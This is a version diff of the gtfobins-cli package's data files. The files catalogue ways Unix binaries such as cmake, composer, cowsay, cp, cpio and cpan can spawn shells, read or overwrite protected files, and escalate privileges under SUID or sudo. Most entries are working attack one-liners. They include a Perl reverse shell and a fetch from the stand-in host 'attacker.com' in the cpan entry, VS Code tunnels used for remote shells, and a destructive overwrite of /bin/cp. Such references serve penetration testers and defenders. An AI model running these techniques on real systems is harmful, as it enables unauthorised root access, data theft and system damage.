gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/chown.json

@@ -1,15 +1,16 @@
 {
-  "description": "This can be run with elevated privileges to change ownership and then read, write, or execute a file.",
   "functions": {
     "suid": [
       {
-        "code": "./chown $(id -un):$(id -gn) [file]\n"
+        
+        "code": "LFILE=file_to_change\n./chown $(id -un):$(id -gn) $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo chown $(id -un):$(id -gn) [file]\n"
+        
+        "code": "LFILE=file_to_change\nsudo chown $(id -un):$(id -gn) $LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/chroot.json

@@ -2,13 +2,15 @@
   "functions": {
     "suid": [
       {
+        
         "code": "./chroot / /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo chroot /\n"
       }
     ]
   }
-}
+}

gtfo/data/chrt.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "",
+        "code": "chrt 26 /bin/sh\n"
+      }
+    ],
+    "command": [
+      {
+        "description": "",
+        "code": "COMMAND='/usr/bin/id'\nchrt 26 \"$COMMAND\"\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "",
+        "code": "./chrt 26 sh -p -c 'reset; exec sh -p 1>&0 2>&0'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo chrt 26 /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/clamscan.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\nTF=$(mktemp -d)\ntouch $TF/empty.yara\nclamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\nTF=$(mktemp -d)\ntouch $TF/empty.yara\n./clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nTF=$(mktemp -d)\ntouch $TF/empty.yara\nsudo clamscan --no-summary -d $TF -f $LFILE 2>&1 | sed -nE 's/^(.*): No such file or directory$/\\1/p'\n"
+      }
+    ]
+  }
+}

gtfo/data/clisp.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "",
+        "code": "clisp -x '(ext:run-shell-command \"sh\") (ext:exit)'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo clisp -x '(ext:run-shell-command \"sh\") (ext:exit)'\n"
+      }
+    ]
+  }
+}

gtfo/data/cmake.json

@@ -0,0 +1,28 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "It can be used to break out from a restricted environment by spawning an interactive system shell.",
+        "code": "echo \"execute_process(COMMAND bash -i)\" > CMakeLists.txt\ncmake .\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "It can read files, and may be used to perform privileged reads or discloe files outside a restrited file system",
+        "code": "LFILE=file_to_read\ncmake -E cat $LFILE\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        "description": "It can perform execution in a privileged context, given the SUID bit is set",
+        "code": "echo \"execute_process(COMMAND whoami)\" > CMakeLists.txt\ncmake .\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "It can perform execution in a privileged context, given the user can run the binary with sudo",
+        "code": "echo \"execute_process(COMMAND bash -i)\" > CMakeLists.txt\nsudo cmake .\n"
+      }
+    ]
+  }
+}

gtfo/data/cmp.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "file-read": [
+      {
+        
+        "code": "LFILE=file_to_read\ncmp $LFILE /dev/zero -b -l\n"
+      }
+    ],
+    "suid": [
+      {
+        
+        "code": "LFILE=file_to_read\n./cmp $LFILE /dev/zero -b -l\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "LFILE=file_to_read\nsudo cmp $LFILE /dev/zero -b -l\n"
+      }
+    ]
+  }
+}

gtfo/data/cobc.json

@@ -2,13 +2,15 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp -d)\necho 'CALL \"SYSTEM\" USING \"/bin/sh\".' > $TF/x\ncobc -xFj --frelax-syntax-checks $TF/x\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp -d)\necho 'CALL \"SYSTEM\" USING \"/bin/sh\".' > $TF/x\nsudo cobc -xFj --frelax-syntax-checks $TF/x\n"
       }
     ]
   }
-}
+}

gtfo/data/code.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "reverse-shell": [
+      {
+        "description": "Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.\n\nSelect `View \\ Terminal` to spawn a shell on remote.\n",
+        "code": "code tunnel -name 'my-tunnel-name'\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.\n\nIn the `Explorer` tab, select `Open Folder`, then right-click on the folder and select `Upload`.\n\nSelect file from the local file browser.\n",
+        "code": "code tunnel -name 'my-tunnel-name'\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.\n\nIn the `Explorer` tab, select `Open Folder`, then select a file, right-click and select `Download`.\n",
+        "code": "code tunnel -name 'my-tunnel-name'\n"
+      }
+    ]
+  }
+}

gtfo/data/column.json

@@ -1,19 +1,21 @@
 {
-  "description": "'column' expects textual data.\n",
   "functions": {
     "file-read": [
       {
-        "code": "column [file]\n"
+        
+        "code": "LFILE=file_to_read\ncolumn $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./column [file]\n"
+        
+        "code": "LFILE=file_to_read\n./column $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo column [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo column $LFILE\n"
       }
     ]
   }

gtfo/data/comm.json

@@ -2,17 +2,20 @@
   "functions": {
     "file-read": [
       {
-        "code": "comm [file] /dev/null 2>/dev/null\n"
+        
+        "code": "LFILE=file_to_read\ncomm $LFILE /dev/null 2>/dev/null\n"
       }
     ],
     "suid": [
       {
-        "code": "comm [file] /dev/null 2>/dev/null\n"
+        
+        "code": "LFILE=file_to_read\ncomm $LFILE /dev/null 2>/dev/null\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo comm [file] /dev/null 2>/dev/null\n"
+        
+        "code": "LFILE=file_to_read\nsudo comm $LFILE /dev/null 2>/dev/null\n"
       }
     ]
   }

gtfo/data/composer.json

@@ -2,16 +2,19 @@
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\ncomposer --working-dir=$TF run-script x\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\n./composer --working-dir=$TF run-script x\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp -d)\necho '{\"scripts\":{\"x\":\"/bin/sh -i 0<&3 1>&3 2>&3\"}}' >$TF/composer.json\nsudo composer --working-dir=$TF run-script x\n"
       }
     ]

gtfo/data/cowsay.json

@@ -1,13 +1,14 @@
 {
-  "description": "It allows to execute Perl code, other functions may apply.",
   "functions": {
     "shell": [
       {
+        
         "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\ncowsay -f $TF x\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowsay -f $TF x\n"
       }
     ]

gtfo/data/cowthink.json

@@ -1,14 +1,16 @@
----
-description: It allows to execute Perl code, other functions may apply.
-functions:
-  shell:
-    - code: |
-        TF=$(mktemp)
-        echo 'exec "/bin/sh";' >$TF
-        cowthink -f $TF x
-  sudo:
-    - code: |
-        TF=$(mktemp)
-        echo 'exec "/bin/sh";' >$TF
-        sudo cowthink -f $TF x
----
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\ncowthink -f $TF x\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "TF=$(mktemp)\necho 'exec \"/bin/sh\";' >$TF\nsudo cowthink -f $TF x\n"
+      }
+    ]
+  }
+}

gtfo/data/cp.json

@@ -2,31 +2,43 @@
   "functions": {
     "file-read": [
       {
-        "code": "cp \"[file]\" /dev/stdout\n"
+        
+        "code": "LFILE=file_to_read\ncp \"$LFILE\" /dev/stdout\n"
       }
     ],
     "file-write": [
       {
-        "code": "echo \"DATA\" | cp /dev/stdin \"[file]\"\n"
+        
+        "code": "LFILE=file_to_write\necho \"DATA\" | cp /dev/stdin \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "echo \"DATA\" | ./cp /dev/stdin \"[file]\"\n"
+        
+        "code": "LFILE=file_to_write\necho \"DATA\" | ./cp /dev/stdin \"$LFILE\"\n"
       },
       {
-        "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.",
-        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\n./cp $TF [file]\n"
+        "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)",
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\n./cp $TF $LFILE\n"
+      },
+      {
+        "description": "This can copy SUID permissions from any SUID binary (e.g., `cp` itself) to another.",
+        "code": "LFILE=file_to_change\n./cp --attributes-only --preserve=all ./cp \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "echo \"DATA\" | sudo cp /dev/stdin \"[file]\"\n"
+        
+        "code": "LFILE=file_to_write\necho \"DATA\" | sudo cp /dev/stdin \"$LFILE\"\n"
+      },
+      {
+        "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges. (The GNU version of `cp` has the `--parents` option that can be used to also create the directory hierarchy specified in the source path, to the destination folder.)",
+        "code": "LFILE=file_to_write\nTF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF $LFILE\n"
       },
       {
-        "description": "This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.",
-        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nsudo cp $TF [file]\n"
+        "description": "This overrides `cp` itself with a shell (or any other executable) that is to be executed as root, useful in case a `sudo` rule allows to only run `cp` by path. Warning, this is a destructive action.",
+        "code": "sudo cp /bin/sh /bin/cp\nsudo cp\n"
       }
     ]
   }
-}
+}

gtfo/data/cpan.json

@@ -2,32 +2,33 @@
   "functions": {
     "shell": [
       {
-        "description": "'cpan' lets you execute perl commands with the '! command'.\n",
+        "description": "`cpan` lets you execute perl commands with the `! command`.\n",
         "code": "cpan\n! exec '/bin/bash'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'nc -lvp [port]' on the attacker box to receive the shell.",
-        "code": "export RHOST=[host]\nexport RPORT=[port]\ncpan\n! use Socket; my $i=\"$ENV{RHOST}\"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/sh -i\");};\n"
+        "description": "Run `nc -lvp RPORT` on the attacker box to receive the shell.",
+        "code": "export RHOST=localhost\nexport RPORT=9000\ncpan\n! use Socket; my $i=\"$ENV{RHOST}\"; my $p=$ENV{RPORT}; socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\")); if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\"); open(STDOUT,\">&S\"); open(STDERR,\">&S\"); exec(\"/bin/sh -i\");};\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Serve files in the local folder running an HTTP server on port 8080. Install the dependency via 'cpan HTTP::Server::Simple'.",
+        "description": "Serve files in the local folder running an HTTP server on port 8080. Install the dependency via `cpan HTTP::Server::Simple`.",
         "code": "cpan\n! use HTTP::Server::Simple; my $server= HTTP::Server::Simple->new(); $server->run();\n"
       }
     ],
     "file-download": [
       {
-        "description": "Fetch a remote file via an HTTP GET request and store it in 'PWD'.",
-        "code": "export URL=[host]/[file]\ncpan\n! use File::Fetch; my $file = (File::Fetch->new(uri => \"$ENV{URL}\"))->fetch();\n"
+        "description": "Fetch a remote file via an HTTP GET request and store it in `PWD`.",
+        "code": "export URL=http://attacker.com/file_to_get\ncpan\n! use File::Fetch; my $file = (File::Fetch->new(uri => \"$ENV{URL}\"))->fetch();\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo cpan\n! exec '/bin/bash'\n"
       }
     ]
   }
-}
+}

gtfo/data/cpio.json

@@ -2,46 +2,48 @@
   "functions": {
     "shell": [
       {
+        
         "code": "echo '/bin/sh </dev/tty >/dev/tty' >localhost\ncpio -o --rsh-command /bin/sh -F localhost:\n"
       }
     ],
     "file-read": [
       {
         "description": "The content of the file is printed to standard output, between the cpio archive format header and footer.",
-        "code": "echo \"[file]\" | cpio -o\n"
+        "code": "LFILE=file_to_read\necho \"$LFILE\" | cpio -o\n"
       },
       {
-        "description": "The whole directory structure is copied to '$TF'.",
-        "code": "TF=$(mktemp -d)\necho \"[file]\" | cpio -dp $TF\ncat \"$TF/[file]\"\n"
+        "description": "The whole directory structure is copied to `$TF`.",
+        "code": "LFILE=file_to_read\nTF=$(mktemp -d)\necho \"$LFILE\" | cpio -dp $TF\ncat \"$TF/$LFILE\"\n"
       }
     ],
     "file-write": [
       {
-        "description": "Copies the file to the dir directory.",
-        "code": "echo [data] >[file]\necho [file] | cpio -up [dir]\n"
+        "description": "Copies `$LFILE` to the `$LDIR` directory.",
+        "code": "LFILE=file_to_write\nLDIR=where_to_write\necho DATA >$LFILE\necho $LFILE | cpio -up $LDIR\n"
       }
     ],
     "suid": [
       {
-        "description": "The whole directory structure is copied to '$TF'.",
-        "code": "TF=$(mktemp -d)\necho \"[file]\" | ./cpio -R $UID -dp $TF\ncat \"$TF/[file]\"\n"
+        "description": "The whole directory structure is copied to `$TF`.",
+        "code": "LFILE=file_to_read\nTF=$(mktemp -d)\necho \"$LFILE\" | ./cpio -R $UID -dp $TF\ncat \"$TF/$LFILE\"\n"
       },
       {
         "description": "Copies `$LFILE` to the `$LDIR` directory.",
-        "code": "echo [data] >[file]\necho [file] | ./cpio -R 0:0 -p [dir]\n"
+        "code": "LFILE=file_to_write\nLDIR=where_to_write\necho DATA >$LFILE\necho $LFILE | ./cpio -R 0:0 -p $LDIR\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "echo '/bin/sh </dev/tty >/dev/tty' >localhost\nsudo cpio -o --rsh-command /bin/sh -F localhost:\n"
       },
       {
-        "description": "The whole directory structure is copied to '$TF'.",
-        "code": "TF=$(mktemp -d)\necho \"[file]\" | sudo cpio -R $UID -dp $TF\ncat \"$TF/[file]\"\n"
+        "description": "The whole directory structure is copied to `$TF`.",
+        "code": "LFILE=file_to_read\nTF=$(mktemp -d)\necho \"$LFILE\" | sudo cpio -R $UID -dp $TF\ncat \"$TF/$LFILE\"\n"
       },
       {
-        "description": "Copies the file to the dir directory.",
-        "code": "echo [data] >[file]\necho [file] | sudo cpio -R 0:0 -p [dir]\n"
+        "description": "Copies `$LFILE` to the `$LDIR` directory.",
+        "code": "LFILE=file_to_write\nLDIR=where_to_write\necho DATA >$LFILE\necho $LFILE | sudo cpio -R 0:0 -p $LDIR\n"
       }
     ]
   }

gtfo/data/cpulimit.json

@@ -2,17 +2,20 @@
   "functions": {
     "shell": [
       {
-        "code": "cpulimit -l 100 -f /bin/sh"
+        
+        "code": "cpulimit -l 100 -f /bin/sh\n"
       }
     ],
     "suid": [
       {
-        "code": "./cpulimit -l 100 -f -- /bin/sh -p"
+        
+        "code": "./cpulimit -l 100 -f -- /bin/sh -p\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo cpulimit -l 100 -f /bin/sh"
+        
+        "code": "sudo cpulimit -l 100 -f /bin/sh\n"
       }
     ]
   }

gtfo/data/crash.json

@@ -2,20 +2,21 @@
   "functions": {
     "shell": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "crash -h\n!sh\n"
       }
     ],
     "command": [
       {
-        "code": "CRASHPAGER=\"[command]\" crash -h\n"
+        
+        "code": "COMMAND='/usr/bin/id'\nCRASHPAGER=\"$COMMAND\" crash -h\n"
       }
     ],
     "sudo": [
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo crash -h\n!sh\n"
       }
     ]
   }
-}
+}

gtfo/data/crontab.json

@@ -2,15 +2,15 @@
   "functions": {
     "command": [
       {
-        "description": "The commands are executed according to the crontab file edited via the 'crontab' utility.",
-        "code": "crontab -e"
+        "description": "The commands are executed according to the crontab file edited via the `crontab` utility.",
+        "code": "crontab -e\n"
       }
     ],
     "sudo": [
       {
-        "description": "The commands are executed according to the crontab file edited via the 'crontab' utility.",
-        "code": "sudo crontab -e"
+        "description": "The commands are executed according to the crontab file edited via the `crontab` utility.",
+        "code": "sudo crontab -e\n"
       }
     ]
   }
-}
+}

gtfo/data/csh.json

@@ -2,23 +2,27 @@
   "functions": {
     "shell": [
       {
-        "code": "csh"
+        
+        "code": "csh\n"
       }
     ],
     "file-write": [
       {
-        "code": "ash -c 'echo DATA > [file]'\n"
+        
+        "code": "export LFILE=file_to_write\nash -c 'echo DATA > $LFILE'\n"
       }
     ],
     "suid": [
       {
-        "code": "./csh -b"
+        
+        "code": "./csh -b\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo csh"
+        
+        "code": "sudo csh\n"
       }
     ]
   }
-}
+}

gtfo/data/csplit.json

@@ -2,17 +2,26 @@
   "functions": {
     "file-read": [
       {
-        "code": "csplit [file] 1\ncat xx01\n"
+        
+        "code": "LFILE=file_to_read\ncsplit $LFILE 1\ncat xx01\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "Writes the data to `xx0file_to_write`. If needed, a different prefix can be specified with `-f` (instead of `xx`).",
+        "code": "TF=$(mktemp)\necho \"DATA\" > $TF\nLFILE=file_to_write\ncsplit -z -b \"%d$LFILE\" $TF 1\n"
       }
     ],
     "suid": [
       {
-        "code": "csplit [file] 1\ncat xx01\n"
+        
+        "code": "LFILE=file_to_read\ncsplit $LFILE 1\ncat xx01\n"
       }
     ],
     "sudo": [
       {
-        "code": "csplit [file] 1\ncat xx01\n"
+        
+        "code": "LFILE=file_to_read\ncsplit $LFILE 1\ncat xx01\n"
       }
     ]
   }